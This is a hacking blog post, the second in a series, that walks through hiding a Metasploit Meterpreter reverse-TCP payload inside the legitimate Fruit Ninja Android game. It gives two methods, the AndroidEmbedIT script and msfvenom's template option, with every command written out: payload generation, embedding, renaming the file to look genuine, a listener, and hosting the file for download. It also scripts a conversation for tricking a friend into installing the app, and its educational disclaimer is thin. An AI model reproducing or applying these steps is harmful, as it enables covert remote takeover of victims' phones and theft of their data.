About Posts

Hey everybody, welcome back. Hope you're safe and sound.

In the first part Part-1 of the blog, we learned how to create a malicious android application and hack the android phones. We also learned the preventive measures in which how we can restrain ourselves from being a victim.

In this part, we will learn more sophisticated way to create a malicious android application.

So what we are going to do here is, we will embed our malicious android application which we learned to create in Part-1 with legitimate android application. So, let's begin.

Method-1

To embed a malware in legitimate APK, you need to go through several process. Once you create your malicious APK, you need to decompile both malicious and legitimate APKs and inject the code of malicious APK into the legitimate ones. To inject a code in the legitimate android application is a tough task. Even if you're able to inject the code successfully, the APK needs to be properly compiled and signed so that it can execute successfully without any error when the victim uses it in his/her phone.

Going through all these processes manually, is time consuming and there are high chances that we can face issue while embedding the malware in APK.

To avoid such issues, we will be using one nice script named AndroidEmbedIT written by yoda66, hosted on Github. According to the script, it performs the following actions to embed a Metasploit generated APK file into another legitimate APK.

• Decompiles a Metasploit APK file, and any other APK file.

• Locates the main Activity entrypoint in the APK being targeted.

• Copies all Metasploit APK staging code to destination APK.

• Adjusts the main Activity entrypoint smali file with an invoke-static call to kick off the Metasploit stage.

• Adjusts the final AndroidManifest.xml with appropriate added permissions.

• Recompiles, and resigns the final APK file.


Now, it's time to start our game..!!

Note: Before we proceed, please keep in mind that this tutorial/article is just for an educational purpose. This is to make everyone aware about the consequences of using android application from an untrusted/unknown sources.

Like mentioned in previous blog Part-1, I will be performing the whole process in my own network only. But, one can perform the attack process in any network either LAN or WAN (External network).

Before we start getting into the actual process, let's assume one scenario. In this process, 4 actors will be involved:

• Kali Linux Machine (Attacker i.e You)

• Malicious Android Application (APK)

• Legitimate Android Application (APK)

• Android Phone (Victim i.e. Your Friend)

Suppose, a widely used game named Fruit Ninja is removed from the play store. Your friend really loved that game but he is not able to find the game on play store. Now, he approaches you.

Friend: Hey bro, I couldn't find Fruit Ninja on play store. Have they removed it? I really liked that game.

You: Yeah bro, they removed it from play store last week but you can get it from the internet.

Friend: Bro, can you please download it for me? I'm having internet issues. You can share with me via file-sharing app or any other means.

You: Sure, why not..!!

scheming rooster teeth GIF by Achievement Hunter (GIF Image)

Note: Assuming attacker(you) and victim(friend) are on the same network here.

Step-1: Creating Malicious Payload

Create a malicious apk using the following command:

#msfvenom -p android/meterpreter/reverse_tcp LHOST=<local-ip-address> LPORT=<any unused port> -f raw > malicious-android.apk


Step-2: Download AndroidEmbedIT script from Github

To download the script from github using terminal, you can use git command.

#git clone https://github.com/yoda66/AndroidEmbedIT


Now, there are some dependencies need to be installed before launching the script. Here is the list and commands to install the dependencies.

• apktool (#apt install apktool)

• jarsigner (#apt install openjdk-11-jdk-headless)

• keytool (not required; jarsigner installation is enough)

After installing all these dependencies, you can run the python script. As the script is built in python3, make sure python version 3.x is installed in the system.

#python3 android_embedit.py -h

As you can see from the arguments, script requires key details(not required), a legitimate apk and msf apk (malicious apk).

Step-3: Embed the Malicious APK code in Legitimate APK

Here, a widely-used android game Fruit Ninja apk is downloaded for your friend.

Now, we have our both APKs. One is com.fruit-ninja.apk (legitimate application) and the other malicious-android.apk (malicious application).

You can run the python script now.

#python3 android_embedit.py com.fruit-ninja.apk malicious-android.apk

As you can see that the final.apk is created. That means, the apk is properly compiled and signed, hence successfully embedded.

Copy the final.apk to your current folder and rename it with the same legitimate apk name i.e. fruit-ninja.apk.

#mv final.apk fruit-ninja.apk

Step-4: Launch Metasploit Framework

Now, launch the metasploit framework using msfconsole. Once the Metasploit framework is launched, you need to use multi/handler, which is a stub that handles exploits launched outside of the framework. Set the same payload, IP address and port which you used while creating the malicious payload in Step-1.


Step-5: Host the Latest APK and Share the URL to Your Friend to Download

As learned from the previous blog Part-1, you need to host the latest apk using SimpleHTTPServer. Share the URL to your friend, for e.g. http://your-local-ip:8080/fruit-ninja.apk. He will run in his browser's address bar and apk will be downloaded automatically. He can install the application now.


Step-6: Magic Time!

Let him enjoy his favorite game and in the background, our malware will start doing its job simply


The moment he clicks on the game to play, a magic will happen on the other end and he will be totally unware about what is going on in the background. Wanna see?

Et Voilà !

Now as learned from the previous blog, type "help" and you can play around and do some stupid stuffs.


Method-2

Looks pretty cool, right? But, isn't it a bit lengthy process? I mean, you need to download the script from Github. Install the dependencies, blah..blah..blah. Isn't there any easy way, like one-liner something? Definitely, there is. We can use one-liner in-built tool from Kali Linux itself using the same beloved tool "MsfVenom".

Make sure you have the fresh legitimate android application i.e. Fruit Ninja.

Now, use the following command and see the magic here.

#msfvenom -x com.fruit-ninja.apk -p android/meterpreter/reverse_tcp LHOST=<your-local-ip> LPORT=<your-local-port> -f raw > fruit-ninja2.apk

Here, -x denotes template, that means you need to specify a custom executable file to use as a template.

When you run the command first time, you may find zipalign error. To resolve this, you need to install zipalign using apt command.

#apt install zipalign

Now, run the msfvenom command again and you can observe from the logs that the procedure is being used here is same as it was in Method-1.

From here, follow the Step-4 to 6 and you're good to go. Easy peasy..!!


Well, that's all I had to show you for now. Hope you find this blog interesting and insightful. Please drop your comments in case of any issues. I will be back with more interesting hacking stuffs. Till then, take care. Stay tuned..!!


References

• https://www.offensive-security.com/metasploit-unleashed/

• https://github.com/yoda66/AndroidEmbedIT